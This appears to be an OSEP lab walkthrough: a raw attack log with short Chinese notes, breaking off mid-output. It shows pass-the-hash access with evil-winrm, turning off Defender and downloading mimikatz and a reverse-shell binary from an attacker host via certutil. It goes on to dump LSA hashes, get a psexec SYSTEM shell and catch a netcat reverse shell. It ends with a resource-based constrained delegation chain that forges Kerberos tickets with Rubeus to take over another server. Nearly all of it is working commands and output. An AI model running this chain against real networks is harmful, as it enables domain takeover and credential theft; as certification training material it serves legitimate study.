┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ **evil-winrm -u complyedge.com\\\\jim -H e48c13cefd8f9456d79cd49651c134e8 -i 172.16.64.166**
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\jim\\Documents> hostname
**file06**
*Evil-WinRM* PS C:\\Users\\jim\\Documents> **ipconfig**
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.64.166
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.64.254
*Evil-WinRM* PS C:\\Users\\jim\\Documents> whoami
complyedge\\jim
*Evil-WinRM* PS C:\\Users\\jim\\Documents> **net localgroup administrators**
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
OPS\\Domain Admins
OPS\\FileAdmin
**OPS\\ForeignFileAdmin**
The command completed successfully.
*Evil-WinRM* PS C:\\Users\\jim\\Documents> cd ..\\Desktop
*Evil-WinRM* PS C:\\Users\\jim\\Desktop> dir
*Evil-WinRM* PS C:\\Users\\jim\\Desktop> cd c:\\Users\\Administrator\\Desktop
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> more proof.txt
3a15a2f052b451eee73ca6384089ebce
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose**
Verbose: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> certutil.exe -urlcache -f <http://192.168.49.64/mimikatz.exe> mimikatz.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **./mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"**
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\\SYSTEM
496 {0;000003e7} 1 D 34133 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;0034f322} 0 D 3536418 COMPLYEDGE\\jim S-1-5-21-1416213050-106196312-571527550-1107 (10g,24p) Primary
* Thread Token : {0;000003e7} 1 D 3560704 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::lsa /patch
Domain : FILE06 / S-1-5-21-1601686234-1881620435-1359276247
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 8821c97bc6b3d2aed6e30a9540f208f3
RID : 000001f7 (503)
User : DefaultAccount
LM :
NTLM :
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f8 (504)
User : WDAGUtilityAccount
LM :
NTLM : 69e97cf61d9814ab925269834e849eb2
mimikatz(commandline) # exit
Bye!
因为jim
同时是管理员,所以可以用psexec
产生一个nt authority\\system
的shell
,这样就进入了域的上下文了:
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ **impacket-psexec complyedge.com/[email protected] -hashes :e48c13cefd8f9456d79cd49651c134e8** 1 ⨯
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 172.16.64.166.....
[*] Found writable share ADMIN$
[*] Uploading file gyxLZiSj.exe
[*] Opening SVCManager on 172.16.64.166.....
[*] Creating service HNhq on 172.16.64.166.....
[*] Starting service HNhq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32> whoami
nt authority\\system
C:\\Windows\\system32> **powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"**
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
C:\\Windows\\system32> cd c:
C:\\Windows\\System32
C:\\Windows\\system32> cd c:\\Users\\Administrator\\Desktop
c:\\Users\\Administrator\\Desktop> certutil.exe -urlcache -f <http://192.168.49.64/rev.exe> rev.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop> certutil.exe -urlcache -f <http://192.168.49.64/PowerView.ps1> PowerView.ps1
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop> certutil.exe -urlcache -f <http://192.168.49.64/Powermad.ps1> Powermad.ps1
**** Online ****
CertUtil: -URLCache command completed successfully.
┌──(kali㉿kali)-[~/Documents/osep/tools/Powermad]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.64] from (UNKNOWN) [192.168.64.169] 62454
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\\Users\\Administrator\\Desktop>powershell -exec bypass
powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\\Users\\Administrator\\Desktop> Import-Module .\\PowerView.ps1
Import-Module .\\PowerView.ps1
PS C:\\Users\\Administrator\\Desktop> Import-Module .\\Powermad.ps1
Import-Module .\\Powermad.ps1
PS C:\\Users\\Administrator\\Desktop> **Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\\$env:Username")) {$_}}**
Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\\$env:Username")) {$_}}
AceType : AccessAllowed
ObjectDN : CN=**JUMP09**,OU=OpsServers,OU=OpsComputers,DC=ops,DC=comply,DC=com
ActiveDirectoryRights : ListChildren, ReadProperty, **GenericWrite**
OpaqueLength : 0
ObjectSID : S-1-5-21-2032401531-514583578-4118054891-1106
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2032401531-514583578-4118054891-1107
AccessMask : 131132
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
Identity : **OPS\\FILE06$**
PS C:\\Users\\Administrator\\Desktop> **Get-DomainObject -Identity ops -Properties ms-DS-MachineAccountQuota**
Get-DomainObject -Identity ops -Properties ms-DS-MachineAccountQuota
**ms-ds-machineaccountquota
-------------------------
10**
PS C:\\Users\\Administrator\\Desktop> **New-MachineAccount -MachineAccount crack -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose**
New-MachineAccount -MachineAccount crack -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose
VERBOSE: [+] Domain Controller = cdc07.ops.comply.com
VERBOSE: [+] Domain = ops.comply.com
VERBOSE: [+] SAMAccountName = crack$
VERBOSE: [+] Distinguished Name = CN=crack,CN=Computers,DC=ops,DC=comply,DC=com
[+] Machine account crack added
PS C:\\Users\\Administrator\\Desktop> **Get-DomainComputer -Identity crack**
Get-DomainComputer -Identity crack
pwdlastset : 7/31/2022 6:52:11 AM
logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=crack,CN=Computers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user...}
name : crack
objectsid : S-1-5-21-2032401531-514583578-4118054891-6101
samaccountname : crack$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
cn : crack
whenchanged : 7/31/2022 1:52:11 PM
instancetype : 4
usncreated : 69859
objectguid : 4ce0a993-ad2f-4450-850a-8ee727907858
lastlogon : 12/31/1600 4:00:00 PM
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : 1/1/1601 12:00:00 AM
serviceprincipalname : {RestrictedKrbHost/crack, HOST/crack, RestrictedKrbHost/crack.ops.comply.com,
HOST/crack.ops.comply.com}
ms-ds-creatorsid : {1, 5, 0, 0...}
badpwdcount : 0
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT
whencreated : 7/31/2022 1:52:11 PM
countrycode : 0
primarygroupid : 515
iscriticalsystemobject : False
usnchanged : 69861
dnshostname : crack.ops.comply.com
PS C:\\Users\\Administrator\\Desktop> **Get-DomainComputer -Identity jump09**
Get-DomainComputer -Identity jump09
pwdlastset : 7/31/2022 6:47:22 AM
logoncount : 72
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=JUMP09,OU=OpsServers,OU=OpsComputers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 7/31/2022 6:32:22 AM
name : JUMP09
objectsid : S-1-5-21-2032401531-514583578-4118054891-1106
samaccountname : JUMP09$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
cn : JUMP09
whenchanged : 7/31/2022 1:47:22 PM
instancetype : 4
usncreated : 13129
objectguid : 09e4b024-6ae9-4e2e-9326-85acd9d7a298
operatingsystem : Windows Server 2019 Standard
operatingsystemversion : 10.0 (17763)
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/16/2020 6:43:32 AM, 7/15/2020 9:50:12 PM, 7/15/2020 9:41:16 PM, 1/1/1601 12:00:00
AM}
serviceprincipalname : {WSMAN/jump09, WSMAN/jump09.ops.comply.com, TERMSRV/JUMP09,
TERMSRV/jump09.ops.comply.com...}
lastlogon : 7/31/2022 6:54:50 AM
badpwdcount : 0
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT
whencreated : 7/15/2020 9:29:45 PM
countrycode : 0
primarygroupid : 515
iscriticalsystemobject : False
msds-supportedencryptiontypes : 28
usnchanged : 69837
dnshostname : jump09.ops.comply.com
PS C:\\Users\\Administrator\\Desktop> **$sid =Get-DomainComputer -Identity crack -Properties objectsid | Select -Expand objectsid**
$sid =Get-DomainComputer -Identity crack -Properties objectsid | Select -Expand objectsid
PS C:\\Users\\Administrator\\Desktop> **$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"**
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"
PS C:\\Users\\Administrator\\Desktop> **$SDbytes = New-Object byte[] ($SD.BinaryLength)**
$SDbytes = New-Object byte[] ($SD.BinaryLength)
PS C:\\Users\\Administrator\\Desktop> **$SD.GetBinaryForm($SDbytes,0)**
$SD.GetBinaryForm($SDbytes,0)
PS C:\\Users\\Administrator\\Desktop> **Get-DomainComputer -Identity jump09 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}**
Get-DomainComputer -Identity jump09 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
PS C:\\Users\\Administrator\\Desktop>
PS C:\\Users\\Administrator\\Desktop> Get-DomainComputer -Identity jump09
Get-DomainComputer -Identity jump09
pwdlastset : 7/31/2022 6:47:22 AM
logoncount : 72
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=JUMP09,OU=OpsServers,OU=OpsComputers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 7/31/2022 6:32:22 AM
name : JUMP09
objectsid : S-1-5-21-2032401531-514583578-4118054891-1106
samaccountname : JUMP09$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
cn : JUMP09
whenchanged : 7/31/2022 2:09:40 PM
instancetype : 4
usncreated : 13129
objectguid : 09e4b024-6ae9-4e2e-9326-85acd9d7a298
operatingsystem : Windows Server 2019 Standard
operatingsystemversion : 10.0 (17763)
lastlogoff : 12/31/1600 4:00:00 PM
**msds-allowedtoactonbehalfofotheridentity : {1, 0, 4, 128...}**
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/16/2020 6:43:32 AM, 7/15/2020 9:50:12 PM, 7/15/2020 9:41:16 PM, 1/1/1601
12:00:00 AM}
serviceprincipalname : {WSMAN/jump09, WSMAN/jump09.ops.comply.com, TERMSRV/JUMP09,
TERMSRV/jump09.ops.comply.com...}
lastlogon : 7/31/2022 7:10:50 AM
badpwdcount : 0
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT
whencreated : 7/15/2020 9:29:45 PM
countrycode : 0
primarygroupid : 515
iscriticalsystemobject : False
msds-supportedencryptiontypes : 28
usnchanged : 69909
dnshostname : jump09.ops.comply.com
验证一下:
PS C:\\Users\\Administrator\\Desktop> **$RBCDbytes = Get-DomainComputer jump09 -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity**
$RBCDbytes = Get-DomainComputer jump09 -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
PS C:\\Users\\Administrator\\Desktop> **$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RBCDbytes, 0**
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RBCDbytes, 0
PS C:\\Users\\Administrator\\Desktop> **$Descriptor.DiscretionaryAcl**
$Descriptor.DiscretionaryAcl
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 983551
**SecurityIdentifier : S-1-5-21-2032401531-514583578-4118054891-6101**
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
PS C:\\Users\\Administrator\\Desktop> **ConvertFrom-SID S-1-5-21-2032401531-514583578-4118054891-6101**
ConvertFrom-SID S-1-5-21-2032401531-514583578-4118054891-6101
**OPS\\crack$**
PS C:\\Users\\Administrator\\Desktop> **iwr <http://192.168.49.64:443/Rubeus_x64.exe> -outfile Rubeus_x64.exe**
iwr <http://192.168.49.64:443/Rubeus_x64.exe> -outfile Rubeus_x64.exe
PS C:\\Users\\Administrator\\Desktop> ls
ls
Directory: C:\\Users\\Administrator\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/31/2022 6:40 AM 135586 Powermad.ps1
-a---- 7/31/2022 6:38 AM 791196 PowerView.ps1
-a---- 7/15/2020 2:58 PM 32 proof.txt
-a---- 7/31/2022 6:37 AM 73802 rev.exe
-a---- 7/31/2022 7:14 AM 440832 Rubeus_x64.exe
PS C:\\Users\\Administrator\\Desktop> **.\\Rubeus_x64.exe hash /password:Passw0rd!**
.\\Rubeus_x64.exe hash /password:Passw0rd!
______ _
(_____ \\ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \\| ___ | | | |/___)
| | \\ \\| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.1
[*] Action: Calculate Password Hash(es)
[*] Input password : Passw0rd!
[*] rc4_hmac : **FC525C9683E8FE067095BA2DDC971889**
[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!
PS C:\\Users\\Administrator\\Desktop> **.\\Rubeus_x64.exe s4u /user:crack$ /rc4:FC525C9683E8FE067095BA2DDC971889 /impersonateuser:administrator /msdsspn:CIFS/jump09.ops.comply.com /ptt**
.\\Rubeus_x64.exe s4u /user:crack$ /rc4:FC525C9683E8FE067095BA2DDC971889 /impersonateuser:administrator /msdsspn:CIFS/jump09.ops.comply.com /ptt
______ _
(_____ \\ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \\| ___ | | | |/___)
| | \\ \\| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.1
[*] Action: S4U
[*] Using rc4_hmac hash: FC525C9683E8FE067095BA2DDC971889
[*] Building AS-REQ (w/ preauth) for: 'ops.comply.com\\crack$'
[*] Using domain controller: 172.16.64.165:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIE6jCCBOagAwIBBaEDAgEWooID+zCCA/dhggPzMIID76ADAgEFoRAbDk9QUy5DT01QTFkuQ09NoiMw
IaADAgECoRowGBsGa3JidGd0Gw5vcHMuY29tcGx5LmNvbaOCA68wggOroAMCARKhAwIBAqKCA50EggOZ
ugIBoRsaSrF8u5VPuG/FxTSct/vFTGI+iP1BPTkHLgDsXl7qjhQYKeOcVlrgpojAZSLwyT7qv6qO7obU
nflHad3KJM14LoXtblZUKP5JlSf6dtPFHPuWcPoXcUyLOoK6B2oLJt/2CVMLAeI8VvC7CAaXTlxRqNzK
+35g695s7GzIdHUfrI5OaJTjDfTBpF7HqR/t63glbtx4K5nDjAMWZTHeTGBpmWXVNwGoReQCIZLiOCRe
ERm9NlcqzZ4wJuNKQPQOXhNtZ1P7FCHEBZVVYyqtCvbmzjHmoB5qhvlPRuNp62QpiwlMeNHQMeIZq7/t
8FUkr5cDf6yjPKAK8/gUnscsaQN6u5y/t8yVZc7MriVWmf1xVeLO2+g4VaOVeA++NdrHw6dvoCAHL16G
kWq6MJiBTn91PUcWURiD9b+LkCUq8Oh6UtWCdFCIvDLyiJc9pnDSJ5RPj6hkGq050twd+MvzotYo+ceb
TkVNktCRXwhlytY5wYEIB/Vg/xC4oryEhO4/SfgEiweAPKMsrivu69YMx+2Hnt59pCZDYfT/JY7TNwHV
rIrCQToEE2eJ36EWetpso49Kkq8PLtr/FLqarPUEJUG1aSzmD5B3wpvZUJBk5tG26MX6qXju2vwmFMVv
D2fun+QwEyLBtY+2pHPdKInC6RuR0bRyRyXC6aptX1IEcd2dbRUIWmsexD9+462hTOZvnyHEqN5GsrBl
5xye0CxQ+XBDlvI9fxJm2+JEZmHy/Q7WxrU2vuDeTjU8eycYpCkW3jU6Ias0YdsfrbKmzeXH9yB21pCJ
AS0Z2vY4IjaKY4si93xhdYA7Nwl5d69Uq/mjPwGIm7tGybTl0o8zF2Mjb8CYBWCmNLwF58S4/9Iq9Yeu
hQyRTXIc7Y419pCfPl55ZRujlTW9k14+EGhTwO3c1k5haTMQ6Ua4tmoWoMfVkuu8hfWh9s0P57jL0zGM
p0GKy95BNELg5/itYIY8g3JfypCKpYqHZ/zoQyIb/B7IOplibVVnZIx1AnyAfHpRbh0POCqdNM5+dvEI
g1biufCYaUTs/mt72hq/4vjnY2ACshKsyU29WDQ/SUdqgpGfAI9rLAb//qrZyimBqhtXRSJcNxt5Ee+K
MOBL2FkE2yhof9D9FPKQHn+TnRE4I+ftdhqHqzIsQJ18+158IB9c3leycxiHm119L9hyFjtdBEeO6V5e
X9w9Ua9BCgzOiTuo1ap0iVHfSTtVo4HaMIHXoAMCAQCigc8Egcx9gckwgcaggcMwgcAwgb2gGzAZoAMC
ARehEgQQNjbVFOaYHjWML2AMPOsU96EQGw5PUFMuQ09NUExZLkNPTaITMBGgAwIBAaEKMAgbBmNyYWNr
JKMHAwUAQOEAAKURGA8yMDIyMDczMTE0MjMyM1qmERgPMjAyMjA4MDEwMDIzMjNapxEYDzIwMjIwODA3
MTQyMzIzWqgQGw5PUFMuQ09NUExZLkNPTakjMCGgAwIBAqEaMBgbBmtyYnRndBsOb3BzLmNvbXBseS5j
b20=
[*] Action: S4U
[*] Building S4U2self request for: '[email protected]'
[*] Using domain controller: cdc07.ops.comply.com (172.16.64.165)
[*] Sending S4U2self request to 172.16.64.165:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to '[email protected]'
[*] base64(ticket.kirbi):
doIFPDCCBTigAwIBBaEDAgEWooIEVjCCBFJhggROMIIESqADAgEFoRAbDk9QUy5DT01QTFkuQ09NohMw
EaADAgEBoQowCBsGY3JhY2sko4IEGjCCBBagAwIBF6EDAgEBooIECASCBAR6NQWfZ13zANbdcS//TflB
8Ztz6QUnoKkfmE9NFl8zmm2ubDHMoKIraV1oV8d2Vsd+Fc4aPI7lzQLNaxmHtIu7mF0r05ISkYpD4eGj
bGPj8rN/VhLiDseJSXfk3GMKvew+LngTVLoZPlHY4qZQ2Uo7MYpspn+gQejN3R9xo8vY0+OuclamNWd9
Rpl/TwZU8IjZ9hXTEg/cb5B5O7lKrLxO1WVtXyKPimVwPCoCxDXF8ix7FCntVp4G/KOu8eWo4Bmcjg8f
YYOCn1rwEpSXGCd3vwpMtBvP9fktTygFFuaSprachvCvVscDE81xvzF3XcBv/XFyZ5JH/Dbz4Ce0Oh+t
roIl7hbg9QGx4irLHsDHM2thZyn5wBez2kk4VDjbQDTuynELpw0AP5EGeRHTwhBAcKHWvwthjClokddN
i+G99BbLzvM9F9FHxxv5+jFX/eRmNXOB6fEna6XvPVvjkJcFbq/Z8zoqqEAVI8RQCGCKtn1W+NqPq3VQ
ijXwd1LK0GnrIO/LF5XOHEE3jlKxQiFWTPFl8g0BYV0CtoYAhS2ssXmgOPTx/rprlAS39Biq7aaGawfi
AMMZn7xTUtIn4HQ4fdmsiYsIwl80/EzxRdlAG6f9iMUt53keic2zNgldLYvroEZGuV3G7dkdHahyV89S
nn+yenXrs7cvScq6veFeo9+cXjGi7cQgX1Bmdjs7bDj/Ewg/b6/f9J61npfcWZg2aGqY6/UroBnxTSQ3
y+R5ONdAvu6GbLjr5OECZ9tpftuzqgBJiQYfJVBZTClsVJBjyBYhOpC8hWOF62n2q0aBGaRs8bTX5cmQ
nsjRzt2Xl5gUd02IvVbTnA3V3FbYe7ca8QomKtovn2BDeeLkEx8CQVSbpFy92ZHvQY21ksHBxhXRL8z8
TgbQ7Yy8S8V4Cn3yUUeRLzm4jCa2sk7IsBn20vqvWBs6Znez+wG/gGRjwpXe+DUAFBAAF4DoI/MFG8kE
3mMjlovUc+fjczoj2p4b+1RTk6IBSskfMib9bh/YYstFPy3e/xh2E7i8cLCdISYbL13R179rAhufNesr
koY+rtHMTnHfGu3OnO+AG09Fc8930CY67fHR805geJvSO3gRi34xZfsXzhgoLM5w96PCM6jSRwMS0/wT
wtr/B9zqBslE9/g+8Eopc7/xJ0zjXZzxwDFVqPfHglo6qImp06quyuSkTCWcyVG9TnL9BMJXBSrouUBW
5JFjZ1yCem0+90GtZDvjBKZ8OSmksct1yR61tDbTFeeuOSSNrSS0aNnDl6LDzwn440cTm/+xFVU4isWl
6xP8tnTQTTNGGoGpCrH7mXl29oLML85tKNLnxi7xJX4CyszQZSFNFmE44k7uxsBhLr3oF6OB0TCBzqAD
AgEAooHGBIHDfYHAMIG9oIG6MIG3MIG0oBswGaADAgEXoRIEEFbnUgjCklp0ZyHZuHpzV9ahEBsOT1BT
LkNPTVBMWS5DT02iGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9yowcDBQAAoQAApREYDzIwMjIwNzMx
MTQyMzIzWqYRGA8yMDIyMDgwMTAwMjMyM1qnERgPMjAyMjA4MDcxNDIzMjNaqBAbDk9QUy5DT01QTFku
Q09NqRMwEaADAgEBoQowCBsGY3JhY2sk
[*] Impersonating user 'administrator' to target SPN 'CIFS/jump09.ops.comply.com'
[*] Building S4U2proxy request for service: 'CIFS/jump09.ops.comply.com'
[*] Using domain controller: cdc07.ops.comply.com (172.16.64.165)
[*] Sending S4U2proxy request to domain controller 172.16.64.165:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'CIFS/jump09.ops.comply.com':
doIGGjCCBhagAwIBBaEDAgEWooIFHzCCBRthggUXMIIFE6ADAgEFoRAbDk9QUy5DT01QTFkuQ09Noigw
JqADAgECoR8wHRsEQ0lGUxsVanVtcDA5Lm9wcy5jb21wbHkuY29to4IEzjCCBMqgAwIBEqEDAgEFooIE
vASCBLj9q69uzIf+jbQegVDHuDQthOgnuoIOoah+VXdkA0JHwh+QgWHDccADuMXzG7tIkPojQumulmyZ
0UtdMMkMywHtSHwLk/IGtRN2ut4pSeSY9cY7Jn0YUb36bxTsPo/+1aAtFSpdb1deh1GMe8QPTniItRv5
mtPraBXM1Ckk6NgFiBXLb7eOn+t5J1ikcHNHJ5rZZ63e3irbSLWuldx8h/HzFnRHGdJQVq6ybmpkipBE
/AMc3q+pZGHIZAPDCKLg8e+0TdntLusJU+/PBr4H+cWUQxr4uk0+GPBQ2vfRPFZAnSM+J+Zk43GPh6iH
k4Zg/NULMwfZgmN3QySctplH1QdMvtX4nRnbPas7mZSLOQLZBaNikBy03nbfR2pQcL6hGUZXPJdIO+e2
0P5+bSnCxGUWNd4SrYRZ0GCGc0gxpj3p92XjFt50xTb0oEGKqAYUvcc5MVPLbU0LCXIgMWhltXC0nmOb
zWt4zVt863e4kTq9qZ2KvSb5ci+7EyTRkqPK8fLVAH2db0IcrIQvuEhZ5MnfBwp1bI/GPS5m6jg66iXs
skKPa93JXNkqBwZH6v22YMQs3om6L0SL1svAqtDBZzsY31zCFdETaaKPgIKr/iXDnsU0fbi1WobVzfco
ySC+WqUiPC/V0McqWCYik14IRMKYtqlHMDEWLM+LKjlI1QVAG3mkuHoBNg1NgnpW3780n/AGBQLYxKmw
+Cqyyde80Tu4LBUjKTWndPO0J2CA1aR43Iw9hzeGzNBFXnC/SBpjHjPqbBpxOMXQ7AJlBAtlP3137hvi
p8fD3dTxWeQM8AV3qtB0CrHtaHBW4j4dZHB3jTJ41ldaM7Rnnc95oXBTNLilpROX5CKdozlNSIjZa0xW
h4AZRlahhzEgWiEsDAgVbIvLCx8BI8bL27h6VOknH0B+Zl1GSmV2QhWgwF/rEhxOwJp1Ze2Yi0NeQ++5
NTtnKD9LXg7egqKltxoD+bh1f2Px5aFpgfOJi2najJF78g/HIDKjznBR0ofKPRsMx+EdB1iAS3BZjC3B
4Nz1dAI3A53rHm0OSVbYbHr/C5FxrPf+3KuHhkRsDf9YoQvAtdQzlsw5mPc0cl+nBFucAUEAWgU8Fw2O
HPSNbL3NpjFWklsYeUVLAw/U/ha15yjiuE/g97X85Z6dnGBSfRZY3k/eYlXU5UsmjNdQshBbp+pnBUxB
iTjDSB7Pqo/L9GW36X01mSKGSV3gEl0vXpgI/ZpC/GjwlWzvr7q3+JMNle7TqFjJ6PsUMTyNQndCdrZW
HZrOyKwiR/4WEgFqQjOhK+7UuTBNx/yaNGSYs42BhQkSVO1FRGVOKy/gSn+4dFG5ZJdtFYLU5H6li+oh
NiosRYxQNXw7Ei89ACkm3nuyYTTUVO78PNuQUy+vD9MnaLSb5bky6mp+GpQPuC2mtXlnU94t5/PxWYb4
/tmMnTXfyP5PdBDZZJ3YTDF+VWgukrCUCRXUKPh7lsNM2WHElzDJQmt6KJwAa+YqQmfi5txFF61w4Xii
FdH6mokkRjj8Xv+kotZ+Jku2+GKdCRgoB/WZ5RV/tjQRO6Gzm3VkSiO1beKTBApxy7F/ymzd9MRWH7Xv
jPPjyG0jhdXUrHyXj6OB5jCB46ADAgEAooHbBIHYfYHVMIHSoIHPMIHMMIHJoBswGaADAgERoRIEEA6y
m4jfNhH3WtcnSjTv7bGhEBsOT1BTLkNPTVBMWS5DT02iGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9y
owcDBQBAoQAApREYDzIwMjIwNzMxMTQyMzIzWqYRGA8yMDIyMDgwMTAwMjMyM1qnERgPMjAyMjA4MDcx
NDIzMjNaqBAbDk9QUy5DT01QTFkuQ09NqSgwJqADAgECoR8wHRsEQ0lGUxsVanVtcDA5Lm9wcy5jb21w
bHkuY29t
[+] Ticket successfully imported!
PS C:\\Users\\Administrator\\Desktop> **dir \\\\jump09.ops.comply.com\\C$**
dir \\\\jump09.ops.comply.com\\C$
Directory: \\\\jump09.ops.comply.com\\C$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/15/2020 12:48 PM PerfLogs
d-r--- 7/15/2020 5:39 PM Program Files
d----- 7/15/2020 5:29 PM Program Files (x86)
d-r--- 7/16/2020 6:50 AM Users
d----- 7/15/2020 2:30 PM Windows
PS C:\\Users\\Administrator\\Desktop> **more \\\\jump09.ops.comply.com\\C$\\Users\\Administrator\\Desktop\\proof.txt**
more \\\\jump09.ops.comply.com\\C$\\Users\\Administrator\\Desktop\\proof.txt
e4c0df2f40567c401754f890cc6bae50
尝试代码执行:
PS C:\\Users\\Administrator\\Desktop> **.\\Rubeus_x64.exe s4u /user:crack$ /rc4:FC525C9683E8FE067095BA2DDC971889 /impersonateuser:administrator /msdsspn:CIFS/jump09.ops.comply.com /altservice:host,RPCSS,http,wsman,ldap,winrm /ptt**
.\\Rubeus_x64.exe s4u /user:crack$ /rc4:FC525C9683E8FE067095BA2DDC971889 /impersonateuser:administrator /msdsspn:CIFS/jump09.ops.comply.com /altservice:host,RPCSS,http,wsman,ldap,winrm /ptt
______ _
(_____ \\ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \\| ___ | | | |/___)
| | \\ \\| |_| | |_) ) ____| |_| |___ |
